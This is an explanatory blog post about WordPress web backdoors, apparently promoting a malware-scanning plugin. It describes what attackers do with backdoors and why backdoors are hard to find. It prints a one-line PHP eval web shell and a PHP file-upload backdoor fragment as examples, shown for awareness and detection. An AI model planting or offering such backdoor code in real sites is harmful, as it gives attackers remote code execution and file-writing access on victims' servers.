Skip to content

What is a backdoor? The dangers and methods

A backdoor is a method, often secret, of bypassing normal authentication or encryption in a computer system, a product, or an embedded device (e.g. a home router), or its embodiment, e.g. as part of a cryptosystem, an algorithm, a chipset, or a “homunculus computer” —a tiny computer-within-a-computer (such as that found in Intel’s AMT technology).[1][2] Backdoors are often used for securing remote access to a computer, or obtaining access to plaintext in cryptographic systems. The backdoor may be used to gain access to passwords, delete data on hard drives, or transfer information within the cloud.  By Wikipedia

Nowadays, with the widespread use of WordPress, anyone can have an information media, and there are many malicious programs that are installed by falsifying a program on a server called a “WEB backdoor” aimed at the website. Has been confirmed on the site of and is raging around the world.


Web backdoor functions

A web backdoor is a file that has the function of setting arbitrary files on a server or rewriting the contents of other files by a hacker.
Hackers who deprive WordPress admins use the WordPress file export feature to install a backdoor on the server. Hackers perform various unauthorized activities via the backdoor.

● Spam mail distribution
● Use as a springboard to attack other sites
● Mine virtual currency
● Attach a link to some site to try to improve the search order
● Operate fraud sites on the server

There is a possibility that they may be involved in acts that are annoying others and criminal acts.

Difficult to find and eliminate WEB backdoor

Once a site is hacked and a backdoor is installed, finding the code is not easy.
This is because WordPress generally includes more than 5000 files, including themes and plug-ins.

Also, most of the backdoors do not disappear even if you update WordPress later or update the plug-in, and even if you remove the malware once, the backdoor remains on the server The hacker can place malicious files on the server through this backdoor file.

Web backdoor code examples

The backdoor code is often very simple and short. Take the following structure as an example

@eval($_POST["code"]);

This code is a program that hackers can send any kind program remotely that conduct illegal activities. May be obfuscated.

In some cases, there is a direct form for uploading files.

<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "File  ".$_FILES['file']['name']."  uploaded";
} else {
    print "Not working: info:\n";
    print_r($_FILES);
}
}
break;
}

This code is not obfuscated, it is written in a very plain code, so it is hard to notice the backdoor, and it is difficult to find it without taking the difference from the original WordPress files.

WEB backdoors are not only exists in large site but small access site

Don’t you think that a site that doesn’t have a lot of access won’t be hacked?

Hackers automatically visit a vast number of websites to find sites with security vulnerabilities and set up falsified files without missing any small or neglected sites.

This is because a small site or an abandoned site can save time until malware is discovered and it is technically difficult to eliminate malware.

Click here for a scanner that can detect web backdoors.
WordPress Doctor Malware Scan & Security Plug-in